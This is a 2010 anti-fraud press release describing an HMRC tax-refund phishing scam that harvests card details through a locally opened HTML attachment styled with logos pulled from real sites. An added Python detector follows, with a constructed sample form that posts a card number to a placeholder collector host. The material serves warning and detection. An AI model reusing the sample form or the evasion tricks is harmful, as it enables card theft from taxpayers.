Media: Warning to payment card providers of impending widespread fraud
London, England. 2010 03 16 02:45 - immediate release
Internet fraud collects credit card information from UK taxpayers; potential for massive credit card losses.
The Anti Money Laundering Network has this morning learned of a sophisticated e-mail fraud designed to collect credit card numbers from UK taxpayers who are promised a tax refund if they confirm their names, addresses and full credit card information including the security number.
The Anti Money Laundering Network has published details of the fraud at www.chiefofficers.net.
In summary: it uses a web coding technique called "in line images" to pull logos from real websites into a fake web page. This is not new: Nigel Morris-Cotterill, Head, The Anti Money Laundering Network said "I demonstrated this technique to bankers in 1997, and although the technology was not new, the use of it in fraudulent websites was rare. I also demonstrated it to BBC for inclusion in a TV programme and in less than five minutes produced a fake website pretending to be that of a UK bank - the BBC lawyers blocked transmission! And, of course, I explained it in How Not To Be A Money Launderer in 1999. Since then, and with the advent of so-called "rich text" e-mail - that is e-mail that looks like and in fact is a webpage - the technique has become part of the stock-in-trade of internet fraudsters."
But what makes this particular fraud different is that it draws in graphics and other links from many different websites, some very large, meaning that the links cannot be quickly and easily blocked. The fraud will therefore have a longer "shelf-life" than usual internet frauds. Adding to that lifespan is another unusual technique: the fraudulent webpage is not linked from code in the mail itself - it is in a simple, and non-malicious, web page attached to the mail.
Morris-Cotterill says that this has three consequences:
"First, because the mail does not contain links, it bypasses one of the primary methods of identifying such scams.
"Secondly, because the form opens and is completed on the victim's own PC, there is no "redundant" traffic to the collecting website which means that its logs do not spike, arousing suspicion.
"Third, because the form opens locally, spam-site filters set in anti-virus packages or web browsers will not identify it as a fake web site."
Graphics are imported from PayPalObjects.com (a site where PayPal keeps its own content, which it imports into its own webpages using inline techniques), RBSWorldPay.Com, two UK Revenue websites and the internet shopping site argos.co.uk. The form also opens pages on the HM Revenue and Customs and Inland Revenue websites, which are in the https or secure zone, thereby creating the false impression that the form is part of the HMRC web-system.
The success of the scheme relies on two things: first that people will fill in a form if they are getting free stuff - in this case a tax refund; second that once the page is open in a browser, many users will not differentiate between a locally opened page and a page opened from the world wide web.
The fraud is very likely to be successful - much more so than many other scams to collect credit card information.
The risk to credit card companies, internet merchants and banks is potentially substantial. Credit card issuers may choose to argue that users voluntarily gave their details to the fraudster or may argue that, because the form was completed locally, it falls outside the protection some card issuers provide for victims of fake websites.
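For mail administrators, the traits described above (a link-free message body, an attached web page, and a form in that page which sends data to a remote host while borrowing graphics from other sites) can be checked at the gateway. The following is an added example, not code from The Anti Money Laundering Network; the function names, the sample message and the .example hosts are constructed for illustration, and the check is a heuristic.

```python
import re
from email import message_from_bytes, policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse

class AttachmentScan(HTMLParser):
    """Collects hosts a page posts form data to and hosts it pulls assets from."""
    def __init__(self):
        super().__init__()
        self.form_hosts, self.asset_hosts = set(), set()
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        url = a.get("action") if tag == "form" else a.get("src") or a.get("href")
        host = urlparse(url or "").hostname  # None for relative or missing URLs
        if host and tag == "form":
            self.form_hosts.add(host)
        elif host and tag in ("img", "link", "script"):
            self.asset_hosts.add(host)

def inspect_message(raw: bytes) -> list:
    """Return one finding per attached HTML page whose form posts to a remote host."""
    msg = message_from_bytes(raw, policy=policy.default)
    body = msg.get_body(preferencelist=("plain", "html"))
    body_links = bool(body and re.search(r"https?://", body.get_content(), re.I))
    findings = []
    for part in msg.iter_attachments():
        if part.get_content_type() != "text/html":
            continue
        scan = AttachmentScan()
        scan.feed(part.get_content())
        if scan.form_hosts:  # page opens locally but sends form data elsewhere
            findings.append({"attachment": part.get_filename(),
                             "form_posts_to": sorted(scan.form_hosts),
                             "assets_from": sorted(scan.asset_hosts),
                             "body_has_links": body_links})
    return findings

# Constructed sample: link-free body plus an HTML attachment (reserved .example hosts).
SAMPLE_HTML = """<html><body>
<img src="https://static.brand-a.example/logo.gif">
<img src="https://www.taxoffice.example/crest.png">
<form action="https://collector.example/submit" method="post">
<input name="card_number"></form></body></html>"""

def build_sample() -> bytes:
    m = EmailMessage()
    m.set_content("Please complete the attached form to receive your refund.")
    m.add_attachment(SAMPLE_HTML, subtype="html", filename="refund_form.html")
    return m.as_bytes()
```

A finding with `body_has_links` false and several unrelated hosts under `assets_from` matches the pattern in this release; legitimate HTML attachments with forms exist, so treat a hit as a reason to quarantine for review.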
Contact: www.antimoneylaundering.net
The Anti Money Laundering Network: Global Response Centre
Kuala Lumpur (GMT +8) +6 03 2078 9152
About:
The Anti Money Laundering Network is a leading international Group comprising risk management and compliance consultancy, information services, training and e-learning, high-level Fora and The Society of Anti Money Laundering Professionals. How not to be a money launderer is now available in a special reprint for Kindle available from Amazon.com at http://www.amazon.com/How-Money-Launderer-e-reprint-ebook/dp/B0037Z6K5O/...


